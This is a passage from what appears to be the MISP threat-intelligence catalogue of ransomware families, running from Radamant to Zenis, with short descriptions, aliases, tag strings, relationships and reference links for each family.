The tag is: misp-galaxy:ransomware="Radamant"

Radamant has relationships with:

  • similar: misp-galaxy:malpedia="Radamant" with estimative-language:likelihood-probability="likely"

Table 8356. Table References

Links

https://decrypter.emsisoft.com/radamant

http://www.bleepingcomputer.com/news/security/new-radamant-ransomware-kit-adds-rdm-extension-to-encrypted-files/

http://www.nyxbone.com/malware/radamant.html

https://id-ransomware.blogspot.com/2016/04/radamant-ransomware.html

Rakhni

Ransomware Files might be partially encrypted

The tag is: misp-galaxy:ransomware="Rakhni"

Rakhni is also known as:

  • Agent.iih

  • Aura

  • Autoit

  • Pletor

  • Rotor

  • Lamer

  • Isda

  • Cryptokluchen

  • Bandarchor

Rakhni has relationships with:

  • similar: misp-galaxy:ransomware="Bandarchor" with estimative-language:likelihood-probability="likely"

Table 8357. Table References

Links

https://support.kaspersky.com/us/viruses/disinfection/10556

https://id-ransomware.blogspot.com/2016/07/bandarchor-ransomware-aes-256.html

Ramsomeer

Ransomware Based on the DUMB ransomware

The tag is: misp-galaxy:ransomware="Ramsomeer"

Rannoh

Ransomware

The tag is: misp-galaxy:ransomware="Rannoh"

Table 8358. Table References

Links

https://support.kaspersky.com/viruses/disinfection/8547

Ransoc

Ransomware Doesn’t encrypt user files

The tag is: misp-galaxy:ransomware="Ransoc"

Ransoc has relationships with:

  • similar: misp-galaxy:malpedia="Ransoc" with estimative-language:likelihood-probability="likely"

Table 8360. Table References

Links

https://www.proofpoint.com/us/threat-insight/post/ransoc-desktop-locking-ransomware-ransacks-local-files-social-media-profiles

https://www.bleepingcomputer.com/news/security/ransoc-ransomware-extorts-users-who-accessed-questionable-content/

Ransom32

Ransomware no extension change, Javascript Ransomware

The tag is: misp-galaxy:ransomware="Ransom32"

Table 8361. Table References

Links

http://id-ransomware.blogspot.com/2016/04/ransom32.html

RansomLock

Ransomware Locks the desktop

The tag is: misp-galaxy:ransomware="RansomLock"

Table 8362. Table References

Links

https://www.symantec.com/security_response/writeup.jsp?docid=2009-041513-1400-99&tabid=2

RarVault

Ransomware

The tag is: misp-galaxy:ransomware="RarVault"

Table 8363. Table References

Links

http://id-ransomware.blogspot.com/2016/09/rarvault-ransomware.html

Rector

Ransomware

The tag is: misp-galaxy:ransomware="Rector"

Table 8365. Table References

Links

https://support.kaspersky.com/viruses/disinfection/4264

RektLocker

Ransomware

The tag is: misp-galaxy:ransomware="RektLocker"

Table 8366. Table References

Links

https://support.kaspersky.com/viruses/disinfection/4264

http://id-ransomware.blogspot.com/2016/08/rektlocker-ransomware.html

Rokku

Ransomware possibly related with Chimera

The tag is: misp-galaxy:ransomware="Rokku"

Rokku has relationships with:

  • similar: misp-galaxy:malpedia="Rokku" with estimative-language:likelihood-probability="likely"

Table 8368. Table References

Links

https://blog.malwarebytes.org/threat-analysis/2016/04/rokku-ransomware/

https://id-ransomware.blogspot.com/2016/04/rokku-ransomware.html

RoshaLock

Ransomware Stores your files in a password protected RAR file

The tag is: misp-galaxy:ransomware="RoshaLock"

Table 8369. Table References

Links

https://twitter.com/siri_urz/status/842452104279134209

https://id-ransomware.blogspot.com/2017/02/allyourdocuments-ransomware.html

Runsomewere

Ransomware Based on HT/EDA2 Utilizes the Jigsaw Ransomware background

The tag is: misp-galaxy:ransomware="Runsomewere"

Table 8370. Table References

Links

https://twitter.com/struppigel/status/801812325657440256

RussianRoulette

Ransomware Variant of the Philadelphia ransomware

The tag is: misp-galaxy:ransomware="RussianRoulette"

Table 8371. Table References

Links

https://twitter.com/struppigel/status/823925410392080385

SADStory

Ransomware Variant of CryPy

The tag is: misp-galaxy:ransomware="SADStory"

Table 8372. Table References

Links

https://twitter.com/malwrhunterteam/status/845356853039190016

http://id-ransomware.blogspot.com/2017/03/sadstory-ransomware.html

Sage 2.2

Ransomware Sage 2.2 deletes volume snapshots through vssadmin.exe, disables startup repair, uses process wscript.exe to execute a VBScript, and coordinates the execution of scheduled tasks via schtasks.exe.

The tag is: misp-galaxy:ransomware="Sage 2.2"

Table 8373. Table References

Links

https://malwarebreakdown.com/2017/03/16/sage-2-2-ransomware-from-good-man-gate

https://malwarebreakdown.com/2017/03/10/finding-a-good-man/

Sanction

Ransomware Based on HiddenTear, but heavily modified keygen

The tag is: misp-galaxy:ransomware="Sanction"

Table 8375. Table References

Links

http://id-ransomware.blogspot.com/2016/05/sanction-ransomware-3.html

Sanctions

Ransomware

The tag is: misp-galaxy:ransomware="Sanctions"

Sanctions is also known as:

  • Sanctions 2017

Table 8376. Table References

Links

https://www.bleepingcomputer.com/news/security/sanctions-ransomware-makes-fun-of-usa-sanctions-against-russia/

http://id-ransomware.blogspot.com/2017/03/sanctions-2017-ransomware.html

Sardoninir

Ransomware

The tag is: misp-galaxy:ransomware="Sardoninir"

Table 8377. Table References

Links

https://twitter.com/BleepinComputer/status/835955409953357825

Satana

Ransomware

The tag is: misp-galaxy:ransomware="Satana"

Satana has relationships with:

  • similar: misp-galaxy:malpedia="Satana" with estimative-language:likelihood-probability="likely"

Table 8378. Table References

Links

https://blog.malwarebytes.com/threat-analysis/2016/06/satana-ransomware/

https://blog.kaspersky.com/satana-ransomware/12558/

https://id-ransomware.blogspot.com/2016/06/satana-ransomware-0.html

Scraper

Ransomware

The tag is: misp-galaxy:ransomware="Scraper"

Table 8379. Table References

Links

http://securelist.com/blog/research/69481/a-flawed-ransomware-encryptor/

Serpico

Ransomware DetoxCrypto Variant

The tag is: misp-galaxy:ransomware="Serpico"

Serpico has relationships with:

  • similar: misp-galaxy:malpedia="Serpico" with estimative-language:likelihood-probability="likely"

Table 8380. Table References

Links

http://www.nyxbone.com/malware/Serpico.html

http://id-ransomware.blogspot.com/2016/08/serpico-ransomware.html

Shark

Ransomware

The tag is: misp-galaxy:ransomware="Shark"

Shark is also known as:

  • Atom

Shark has relationships with:

  • similar: misp-galaxy:rat="SharK" with estimative-language:likelihood-probability="likely"

Table 8381. Table References

Links

http://www.bleepingcomputer.com/news/security/the-shark-ransomware-project-allows-to-create-your-own-customized-ransomware/

http://www.bleepingcomputer.com/news/security/shark-ransomware-rebrands-as-atom-for-a-fresh-start/

Shujin

Ransomware

The tag is: misp-galaxy:ransomware="Shujin"

Shujin is also known as:

  • KinCrypt

Shujin has relationships with:

  • similar: misp-galaxy:malpedia="Shujin" with estimative-language:likelihood-probability="likely"

Table 8383. Table References

Links

http://www.nyxbone.com/malware/chineseRansom.html

http://blog.trendmicro.com/trendlabs-security-intelligence/chinese-language-ransomware-makes-appearance/

http://id-ransomware.blogspot.com/2016/05/chinese-ransomware.html

Simple_Encoder

Ransomware

The tag is: misp-galaxy:ransomware="Simple_Encoder"

Simple_Encoder is also known as:

  • Tilde

Table 8384. Table References

Links

http://www.bleepingcomputer.com/news/security/the-shark-ransomware-project-allows-to-create-your-own-customized-ransomware/

https://id-ransomware.blogspot.com/2016/07/tilde-ransomware-aes-08.html

SkidLocker

Ransomware Based on EDA2

The tag is: misp-galaxy:ransomware="SkidLocker"

SkidLocker is also known as:

  • Pompous

Table 8385. Table References

Links

http://www.bleepingcomputer.com/news/security/pompous-ransomware-dev-gets-defeated-by-backdoor/

http://www.nyxbone.com/malware/SkidLocker.html

http://id-ransomware.blogspot.com/2016/04/pompous-ransomware.html

Smash!

Ransomware

The tag is: misp-galaxy:ransomware="Smash!"

Table 8386. Table References

Links

https://www.bleepingcomputer.com/news/security/smash-ransomware-is-cute-rather-than-dangerous/

Smrss32

Ransomware

The tag is: misp-galaxy:ransomware="Smrss32"

Table 8387. Table References

Links

http://id-ransomware.blogspot.com/2016/08/smrss32-ransomware.html

Sport

Ransomware

The tag is: misp-galaxy:ransomware="Sport"

Strictor

Ransomware Based on EDA2, shows Guy Fawkes mask

The tag is: misp-galaxy:ransomware="Strictor"

Table 8390. Table References

Links

http://www.nyxbone.com/malware/Strictor.html

Surprise

Ransomware Based on EDA2

The tag is: misp-galaxy:ransomware="Surprise"

Table 8391. Table References

Links

http://id-ransomware.blogspot.com/2016/05/surprise-ransomware-aes-256.html

Survey

Ransomware Still in development, shows FileIce survey

The tag is: misp-galaxy:ransomware="Survey"

Table 8392. Table References

Links

http://www.bleepingcomputer.com/news/security/in-dev-ransomware-forces-you-do-to-survey-before-unlocking-computer/

SynoLocker

Ransomware Exploited Synology NAS firmware directly over WAN

The tag is: misp-galaxy:ransomware="SynoLocker"

TeamXrat

Ransomware

The tag is: misp-galaxy:ransomware="TeamXrat"

Table 8394. Table References

Links

https://securelist.com/blog/research/76153/teamxrat-brazilian-cybercrime-meets-ransomware/

TeslaCrypt 0.x - 2.2.0

Ransomware Factorization

The tag is: misp-galaxy:ransomware="TeslaCrypt 0.x - 2.2.0"

TeslaCrypt 0.x - 2.2.0 is also known as:

  • AlphaCrypt

Table 8395. Table References

Links

http://www.bleepingcomputer.com/forums/t/576600/tesladecoder-released-to-decrypt-exx-ezz-ecc-files-encrypted-by-teslacrypt/

http://www.talosintel.com/teslacrypt_tool/

Threat Finder

Ransomware Files cannot be decrypted Has a GUI

The tag is: misp-galaxy:ransomware="Threat Finder"

TorrentLocker

Ransomware Newer variants not decryptable. Only first 2 MB are encrypted

The tag is: misp-galaxy:ransomware="TorrentLocker"

TorrentLocker is also known as:

  • Crypt0L0cker

  • CryptoFortress

  • Teerac

TorrentLocker has relationships with:

  • similar: misp-galaxy:ransomware="CryptoFortress" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:malpedia="CryptoFortress" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:malpedia="TorrentLocker" with estimative-language:likelihood-probability="likely"

Table 8399. Table References

Links

http://www.bleepingcomputer.com/forums/t/547708/torrentlocker-ransomware-cracked-and-decrypter-has-been-made/

https://twitter.com/PolarToffee/status/804008236600934403

http://blog.talosintelligence.com/2017/03/crypt0l0cker-torrentlocker-old-dog-new.html

http://id-ransomware.blogspot.ru/2016/05/torrentlocker-ransomware-aes-cbc-2048.html

Toxcrypt

Ransomware

The tag is: misp-galaxy:ransomware="Toxcrypt"

Table 8401. Table References

Links

https://id-ransomware.blogspot.com/2016/06/toxcrypt-ransomware-aes-crypto-0.html

Turkish

Ransomware

The tag is: misp-galaxy:ransomware="Turkish"

Table 8405. Table References

Links

https://twitter.com/struppigel/status/821991600637313024

Turkish Ransom

Ransomware

The tag is: misp-galaxy:ransomware="Turkish Ransom"

Table 8406. Table References

Links

http://www.nyxbone.com/malware/turkishRansom.html

UmbreCrypt

Ransomware CrypBoss Family

The tag is: misp-galaxy:ransomware="UmbreCrypt"

Table 8407. Table References

Links

http://www.thewindowsclub.com/emsisoft-decrypter-hydracrypt-umbrecrypt-ransomware

https://id-ransomware.blogspot.com/2016/06/umbrecrypt-ransomware-aes.html

Ungluk

Ransomware Ransom note instructs to use Bitmessage to get in contact with attacker - Secretishere.key - SECRETISHIDINGHEREINSIDE.KEY - secret.key

The tag is: misp-galaxy:ransomware="Ungluk"

Table 8409. Table References

Links

http://id-ransomware.blogspot.com/2016/05/bitmessage-ransomware-aes-256-25-btc.html

Unlock92

Ransomware

The tag is: misp-galaxy:ransomware="Unlock92 "

Table 8410. Table References

Links

https://twitter.com/malwrhunterteam/status/839038399944224768

http://id-ransomware.blogspot.com/2017/02/unlock26-ransomware.html

VapeLauncher

Ransomware CryptoWire variant

The tag is: misp-galaxy:ransomware="VapeLauncher"

Table 8411. Table References

Links

https://twitter.com/struppigel/status/839771195830648833

VaultCrypt

Ransomware

The tag is: misp-galaxy:ransomware="VaultCrypt"

VaultCrypt is also known as:

  • CrypVault

  • Zlader

VaultCrypt has relationships with:

  • similar: misp-galaxy:ransomware="Zlader" with estimative-language:likelihood-probability="likely"

Table 8412. Table References

Links

http://www.nyxbone.com/malware/russianRansom.html

VBRANSOM 7

Ransomware

The tag is: misp-galaxy:ransomware="VBRANSOM 7"

Table 8413. Table References

Links

https://twitter.com/BleepinComputer/status/817851339078336513

Virlock

Ransomware Polymorphism / Self-replication

The tag is: misp-galaxy:ransomware="Virlock"

Virlock is also known as:

  • NSMF

Table 8415. Table References

Links

http://www.nyxbone.com/malware/Virlock.html

http://www.welivesecurity.com/2014/12/22/win32virlock-first-self-reproducing-ransomware-also-shape-shifter/

WildFire Locker

Ransomware Zyklon variant

The tag is: misp-galaxy:ransomware="WildFire Locker"

WildFire Locker is also known as:

  • Hades Locker

WildFire Locker has relationships with:

  • similar: misp-galaxy:ransomware="Hades" with estimative-language:likelihood-probability="likely"

Table 8417. Table References

Links

https://labs.opendns.com/2016/07/13/wildfire-ransomware-gaining-momentum/

https://id-ransomware.blogspot.com/2016/06/wildfire-locker-ransomware-aes-256-cbc.html

Xorist

Ransomware encrypted files will still have the original non-encrypted header of 0x33 bytes length

The tag is: misp-galaxy:ransomware="Xorist"

Table 8418. Table References

Links

https://support.kaspersky.com/viruses/disinfection/2911

https://decrypter.emsisoft.com/xorist

https://twitter.com/siri_urz/status/1006833669447839745

https://id-ransomware.blogspot.com/2016/06/xrtn-ransomware-rsa-1024-gnu-privacy.html

XRTN

Ransomware VaultCrypt family

The tag is: misp-galaxy:ransomware="XRTN "

You Have Been Hacked!!!

Ransomware Attempt to steal passwords

The tag is: misp-galaxy:ransomware="You Have Been Hacked!!!"

Table 8419. Table References

Links

https://twitter.com/malwrhunterteam/status/808280549802418181

Zcrypt

Ransomware

The tag is: misp-galaxy:ransomware="Zcrypt"

Zcrypt is also known as:

  • Zcryptor

Table 8420. Table References

Links

https://blogs.technet.microsoft.com/mmpc/2016/05/26/link-lnk-to-ransom/

http://id-ransomware.blogspot.com/2016/05/zcrypt-ransomware-rsa-2048-email.html

Zlader

Ransomware VaultCrypt family

The tag is: misp-galaxy:ransomware="Zlader"

Zlader is also known as:

  • Russian

  • VaultCrypt

  • CrypVault

Zlader has relationships with:

  • similar: misp-galaxy:ransomware="VaultCrypt" with estimative-language:likelihood-probability="likely"

Table 8422. Table References

Links

http://www.nyxbone.com/malware/russianRansom.html

Zorro

Ransomware

The tag is: misp-galaxy:ransomware="Zorro"

Table 8423. Table References

Links

https://twitter.com/BleepinComputer/status/844538370323812353

http://id-ransomware.blogspot.com/2017/03/zorro-ransomware.html

Zyklon

Ransomware Hidden Tear family, GNL Locker variant

The tag is: misp-galaxy:ransomware="Zyklon"

Zyklon is also known as:

  • GNL Locker

  • Zyklon Locker

Zyklon has relationships with:

  • similar: misp-galaxy:ransomware="GNL Locker" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:malpedia="Zyklon" with estimative-language:likelihood-probability="likely"

Table 8424. Table References

Links

http://id-ransomware.blogspot.com/2016/05/zyklon-locker-ransomware-windows-250.html

vxLock

Ransomware

The tag is: misp-galaxy:ransomware="vxLock"

Table 8425. Table References

Links

https://id-ransomware.blogspot.com/2017/01/vxlock-ransomware.html

Jaff

We recently observed several large scale email campaigns that were attempting to distribute a new variant of ransomware that has been dubbed "Jaff". Interestingly we identified several characteristics that we have previously observed being used during Dridex and Locky campaigns. In a short period of time, we observed multiple campaigns featuring high volumes of malicious spam emails being distributed, each using a PDF attachment with an embedded Microsoft Word document functioning as the initial downloader for the Jaff ransomware.

The tag is: misp-galaxy:ransomware="Jaff"

Jaff has relationships with:

  • similar: misp-galaxy:malpedia="Jaff" with estimative-language:likelihood-probability="likely"

Table 8426. Table References

Links

http://blog.talosintelligence.com/2017/05/jaff-ransomware.html

https://www.bleepingcomputer.com/news/security/jaff-ransomware-distributed-via-necurs-malspam-and-asking-for-a-3-700-ransom/

http://id-ransomware.blogspot.com/2017/05/jaff-ransomware.html

Uiwix Ransomware

Using EternalBlue SMB Exploit To Infect Victims

The tag is: misp-galaxy:ransomware="Uiwix Ransomware"

Uiwix Ransomware is also known as:

  • UIWIX

Table 8427. Table References

Links

https://www.bleepingcomputer.com/news/security/uiwix-ransomware-using-eternalblue-smb-exploit-to-infect-victims/

http://id-ransomware.blogspot.com/2017/05/uiwix-ransomware.html

SOREBRECT

Fileless, Code-injecting Ransomware

The tag is: misp-galaxy:ransomware="SOREBRECT"

Table 8428. Table References

Links

http://blog.trendmicro.com/trendlabs-security-intelligence/analyzing-fileless-code-injecting-sorebrect-ransomware/

Cyron

claims it detected "Children Pornsites" in your browser history

The tag is: misp-galaxy:ransomware="Cyron"

Table 8429. Table References

Links

https://twitter.com/struppigel/status/899524853426008064

https://id-ransomware.blogspot.com/2017/08/cyron-ransomware.html

Kappa

Made with OXAR builder; decryptable

The tag is: misp-galaxy:ransomware="Kappa"

Table 8430. Table References

Links

https://twitter.com/struppigel/status/899528477824700416

Trojan Dz

CyberSplitter variant

The tag is: misp-galaxy:ransomware="Trojan Dz"

Table 8431. Table References

Links

https://twitter.com/struppigel/status/899537940539478016

Xolzsec

ransomware written by self proclaimed script kiddies that should really be considered trollware

The tag is: misp-galaxy:ransomware="Xolzsec"

Table 8432. Table References

Links

https://twitter.com/struppigel/status/899916577252028416

http://id-ransomware.blogspot.com/2017/08/xolzsec-ransomware.html

FlatChestWare

HiddenTear variant; decryptable

The tag is: misp-galaxy:ransomware="FlatChestWare"

Table 8433. Table References

Links

https://twitter.com/struppigel/status/900238572409823232

https://id-ransomware.blogspot.com/2017/08/flatchestware-ransomware.html

SynAck

The ransomware does not use a customized desktop wallpaper to signal its presence, and the only way to discover that SynAck has infected your PC is by the ransom notes dropped on the user’s desktop, named in the format: RESTORE_INFO-[id].txt. For example: RESTORE_INFO-4ABFA0EF.txt In addition, SynAck also appends its own extension at the end of all files it encrypted. This file extensions format is ten random alpha characters for each file. For example: test.jpg.XbMiJQiuoh. Experts believe the group behind SynAck uses RDP brute-force attacks to access remote computers and manually download and install the ransomware.

The tag is: misp-galaxy:ransomware="SynAck"

SynAck is also known as:

  • Syn Ack

SynAck has relationships with:

  • similar: misp-galaxy:malpedia="SynAck" with estimative-language:likelihood-probability="likely"

Table 8434. Table References

Links

https://www.bleepingcomputer.com/news/security/synack-ransomware-sees-huge-spike-in-activity/

https://www.bleepingcomputer.com/news/security/synack-ransomware-uses-process-doppelg-nging-technique/

https://id-ransomware.blogspot.com/2017/09/synack-ransomware.html

SyncCrypt

A new ransomware called SyncCrypt was discovered by Emsisoft security researcher xXToffeeXx that is being distributed by spam attachments containing WSF files. When installed these attachments will encrypt a computer and append the .kk extension to encrypted files.

The tag is: misp-galaxy:ransomware="SyncCrypt"

SyncCrypt has relationships with:

  • similar: misp-galaxy:malpedia="SyncCrypt" with estimative-language:likelihood-probability="likely"

Table 8435. Table References

Links

https://www.bleepingcomputer.com/news/security/synccrypt-ransomware-hides-inside-jpg-files-appends-kk-extension/

http://id-ransomware.blogspot.com/2017/08/synccrypt-ransomware.html

Bad Rabbit

On October 24, 2017, Cisco Talos was alerted to a widescale ransomware campaign affecting organizations across eastern Europe and Russia. As was the case in previous situations, we quickly mobilized to assess the situation and ensure that customers remain protected from this and other threats as they emerge across the threat landscape. There have been several large scale ransomware campaigns over the last several months. This appears to have some similarities to Nyetya in that it is also based on Petya ransomware. Major portions of the code appear to have been rewritten. The distribution does not appear to have the sophistication of the supply chain attacks we have seen recently.

The tag is: misp-galaxy:ransomware="Bad Rabbit"

Bad Rabbit is also known as:

  • BadRabbit

  • Bad-Rabbit

Bad Rabbit has relationships with:

  • similar: misp-galaxy:malpedia="EternalPetya" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:tool="NotPetya" with estimative-language:likelihood-probability="likely"

Table 8436. Table References

Links

http://blog.talosintelligence.com/2017/10/bad-rabbit.html

https://id-ransomware.blogspot.com/2017/10/badrabbit-ransomware.html

https://www.welivesecurity.com/2017/10/24/bad-rabbit-not-petya-back/

https://securelist.com/bad-rabbit-ransomware/82851/

http://www.intezer.com/notpetya-returns-bad-rabbit/

Halloware

A malware author by the name of Luc1F3R is peddling a new ransomware strain called Halloware for the lowly price of $40. Based on evidence gathered by Bleeping Computer, Luc1F3R started selling his ransomware this week, beginning Thursday.

The tag is: misp-galaxy:ransomware="Halloware"

Table 8437. Table References

Links

https://www.bleepingcomputer.com/news/security/halloware-ransomware-on-sale-on-the-dark-web-for-only-40/

http://id-ransomware.blogspot.com/2017/11/halloware-ransomware.html

StorageCrypt

Recently BleepingComputer has received a flurry of support requests for a new ransomware being named StorageCrypt that is targeting NAS devices such as the Western Digital My Cloud. Victims have been reporting that their files have been encrypted and a note left with a ransom demand of between .4 and 2 bitcoins to get their files back. User’s have also reported that each share on their NAS device contains a Autorun.inf file and a Windows executable named 美女与野兽.exe, which translates to Beauty and the beast. From the samples BleepingComputer has received, this Autorun.inf is an attempt to spread the 美女与野兽.exe file to other computers that open the folders on the NAS devices.

The tag is: misp-galaxy:ransomware="StorageCrypt"

Table 8438. Table References

Links

https://www.bleepingcomputer.com/news/security/storagecrypt-ransomware-infecting-nas-devices-using-sambacry/

https://id-ransomware.blogspot.com/2017/11/storagecrypter.html

HC7

A new ransomware called HC7 is infecting victims by hacking into Windows computers that are running publicly accessible Remote Desktop services. Once the developers gain access to the hacked computer, the HC7 ransomware is then installed on all accessible computers on the network. Originally released as HC6, victims began posting about it in the BleepingComputer forums towards the end of November. As this is a Python-to-exe executable, once the script was extracted ID Ransomware creator Michael Gillespie was able determine that it was decryptable and released a decryptor. Unfortunately, a few days later, the ransomware developers released a new version called HC7 that was not decryptable. Thi sis because they removed the hard coded encryption key and instead switched to inputting the key as a command line argument when the attackers run the ransomware executable. Thankfully, there may be a way to get around that as well so that victims can recover their keys.

The tag is: misp-galaxy:ransomware="HC7"

Table 8439. Table References

Links

https://www.bleepingcomputer.com/news/security/hc7-gotya-ransomware-installed-via-remote-desktop-services-spread-with-psexec/

https://id-ransomware.blogspot.com/2017/12/hc7-ransomware.html

qkG

Security researchers have discovered a new ransomware strain named qkG that targets only Office documents for encryption and infects the Word default document template to propagate to new Word documents opened through the same Office suite on the same computer.

The tag is: misp-galaxy:ransomware="qkG"

qkG is also known as:

  • QkG

Table 8441. Table References

Links

https://www.bleepingcomputer.com/news/security/qkg-ransomware-encrypts-only-word-documents-hides-and-spreads-via-macros/

http://id-ransomware.blogspot.com/2017/11/qkg-ransomware.html

Scarab

The Scarab ransomware is a relatively new ransomware strain that was first spotted by security researcher Michael Gillespie in June this year. Written in Delphi, the first version was simplistic and was recognizable via the ".scarab" extension it appended after the names of encrypted files. Malwarebytes researcher Marcelo Rivera spotted a second version in July that used the ".scorpio" extension. The version spotted with the Necurs spam today has reverted back to using the .scarab extension. The current version of Scarab encrypts files but does not change original file names as previous versions. This Scarab version appends each file’s name with the ".[suupport@protonmail.com].scarab" extension. Scarab also deletes shadow volume copies and drops a ransom note named "IF YOU WANT TO GET ALL YOUR FILES BACK, PLEASE READ THIS.TXT" on users' computers, which it opens immediately.

The tag is: misp-galaxy:ransomware="Scarab"

Table 8442. Table References

Links

https://www.bleepingcomputer.com/news/security/scarab-ransomware-pushed-via-massive-spam-campaign/

https://labsblog.f-secure.com/2017/11/23/necurs-business-is-booming-in-a-new-partnership-with-scarab-ransomware/

https://blogs.forcepoint.com/security-labs/massive-email-campaign-spreads-scarab-ransomware

https://twitter.com/malwrhunterteam/status/933643147766321152

https://myonlinesecurity.co.uk/necurs-botnet-malspam-delivering-a-new-ransomware-via-fake-scanner-copier-messages/

https://twitter.com/demonslay335/status/1006222754385924096

https://twitter.com/demonslay335/status/1006908267862396928

https://twitter.com/demonslay335/status/1007694117449682945

https://twitter.com/demonslay335/status/1049316344183836672

https://www.bleepingcomputer.com/news/security/the-week-in-ransomware-october-12th-2018-notpetya-gandcrab-and-more/

https://twitter.com/Amigo_A_/status/1039105453735784448

https://twitter.com/GrujaRS/status/1072057088019496960

http://id-ransomware.blogspot.com/2017/06/scarab-ransomware.html

File Spider

A new ransomware called File Spider is being distributed through spam that targets victims in Bosnia and Herzegovina, Serbia, and Croatia. These spam emails contains malicious Word documents that will download and install the File Spider ransomware onto a victims computer.File Spider is currently being distributed through malspam that appears to be targeting countries such as Croatia, Bosnia and Herzegovina, and Serbia. The spam start with subjects like"Potrazivanje dugovanja", which translates to "Debt Collection" and whose message, according to Google Translate, appear to be in Serbian.

The tag is: misp-galaxy:ransomware="File Spider"

File Spider is also known as:

  • Spider

Table 8443. Table References

Links

https://www.bleepingcomputer.com/news/security/file-spider-ransomware-targeting-the-balkans-with-malspam/

http://id-ransomware.blogspot.com/2017/12/file-spider-ransomware.html

FileCoder

A barely functional piece of macOS ransomware, written in Swift.

The tag is: misp-galaxy:ransomware="FileCoder"

FileCoder is also known as:

  • FindZip

  • Patcher

FileCoder has relationships with:

  • similar: misp-galaxy:ransomware="Patcher" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:malpedia="Patcher" with estimative-language:likelihood-probability="likely"

Table 8444. Table References

Links

https://objective-see.com/blog/blog_0x25.html#FileCoder

MacRansom

A basic piece of macOS ransomware, offered via a 'malware-as-a-service' model.

The tag is: misp-galaxy:ransomware="MacRansom"

MacRansom has relationships with:

  • similar: misp-galaxy:malpedia="MacRansom" with estimative-language:likelihood-probability="likely"

Table 8445. Table References

Links

https://objective-see.com/blog/blog_0x25.html

GandCrab

A new ransomware called GandCrab was released towards the end of last week that is currently being distributed via exploit kits. GandCrab has some interesting features not seen before in a ransomware, such as being the first to accept the DASH currency and the first to utilize the Namecoin powered .BIT tld.

The tag is: misp-galaxy:ransomware="GandCrab"

GandCrab has relationships with:

  • dropped-by: misp-galaxy:exploit-kit="Fallout" with estimative-language:likelihood-probability="almost-certain"

Table 8446. Table References

Links

https://www.bleepingcomputer.com/news/security/gandcrab-ransomware-distributed-by-exploit-kits-appends-gdcb-extension/

https://www.bleepingcomputer.com/news/security/gandcrab-ransomware-being-distributed-via-malspam-disguised-as-receipts/

https://www.bleepingcomputer.com/news/security/gandcrab-ransomware-version-2-released-with-new-crab-extension-and-other-changes/

https://www.bleepingcomputer.com/news/security/gandcrab-version-3-released-with-autorun-feature-and-desktop-background/

https://www.bleepingcomputer.com/news/security/new-fallout-exploit-kit-drops-gandcrab-ransomware-or-redirects-to-pups/

https://www.bleepingcomputer.com/news/security/gandcrab-v5-ransomware-utilizing-the-alpc-task-scheduler-exploit/

https://id-ransomware.blogspot.com/2018/01/gandcrab-ransomware.html

ShurL0ckr

Security researchers uncovered a new ransomware named ShurL0ckr (detected by Trend Micro as RANSOM_GOSHIFR.B) that reportedly bypasses detection mechanisms of cloud platforms. Like Cerber and Satan, ShurL0ckr’s operators further monetize the ransomware by peddling it as a turnkey service to fellow cybercriminals, allowing them to earn additional income through a commission from each victim who pays the ransom.

The tag is: misp-galaxy:ransomware="ShurL0ckr"

Table 8447. Table References

Links

https://www.trendmicro.com/vinfo/us/security/news/cybercrime-and-digital-threats/shurl0ckr-ransomware-as-a-service-peddled-on-dark-web-can-reportedly-bypass-cloud-applications

Cryakl

ransomware

The tag is: misp-galaxy:ransomware="Cryakl"

Cryakl has relationships with:

  • similar: misp-galaxy:ransomware="Offline ransomware" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:malpedia="Cryakl" with estimative-language:likelihood-probability="likely"

Table 8448. Table References

Links

https://sensorstechforum.com/fr/fairytail-files-virus-cryakl-ransomware-remove-restore-data/

https://www.technologynews.tech/cryakl-ransomware-virus

http://www.zdnet.com/article/cryakl-ransomware-decryption-keys-now-available-for-free/

Thanatos

first ransomware seen to ask for payment to be made in Bitcoin Cash (BCH)

The tag is: misp-galaxy:ransomware="Thanatos"

Thanatos has relationships with:

  • similar: misp-galaxy:malpedia="Thanatos" with estimative-language:likelihood-probability="likely"

Table 8449. Table References

Links

https://mobile.twitter.com/EclecticIQ/status/968478323889332226

https://www.eclecticiq.com/resources/thanatos—​ransomware-first-ransomware-ask-payment-bitcoin-cash?type=intel-report

http://id-ransomware.blogspot.com/2018/02/thanatos-ransomware.html

RSAUtil

RSAUtil is distributed by the developer hacking into remote desktop services and uploading a package of files. This package contains a variety of tools, a config file that determines how the ransomware executes, and the ransomware itself.

The tag is: misp-galaxy:ransomware="RSAUtil"

RSAUtil is also known as:

  • Vagger

  • DONTSLIP

Table 8450. Table References

Links

https://www.securityweek.com/rsautil-ransomware-distributed-rdp-attacks

https://www.bleepingcomputer.com/news/security/rsautil-ransomware-helppme-india-com-installed-via-hacked-remote-desktop-services/

http://id-ransomware.blogspot.lu/2017/04/rsautil-ransomware.html

http://id-ransomware.blogspot.lu/2017/04/

Qwerty Ransomware

A new ransomware has been discovered that utilizes the legitimate GnuPG, or GPG, encryption program to encrypt a victim’s files. Currently in the wild, this ransomware is called Qwerty Ransomware and will encrypt a victims files, overwrite the originals, and the append the .qwerty extension to an encrypted file’s name.

The tag is: misp-galaxy:ransomware="Qwerty Ransomware"

Table 8451. Table References

Links

https://www.bleepingcomputer.com/news/security/qwerty-ransomware-utilizes-gnupg-to-encrypt-a-victims-files/

Zenis Ransomware

A new ransomware was discovered this week by MalwareHunterTeam called Zenis Ransomware. While it is currently unknown how Zenis is being distributed, multiple victims have already become infected with this ransomware. What is most disturbing about Zenis is that it not encrypts your files, but also purposely deletes your backups.

The tag is: misp-galaxy:ransomware="Zenis Ransomware"

Table 8452. Table References

Links

https://www.bleepingcomputer.com/news/security/zenis-ransomware-encrypts-your-data-and-deletes-your-backups/

https://id-ransomware.blogspot.com/2018/03/zenis-ransomware.html

Black Ruby

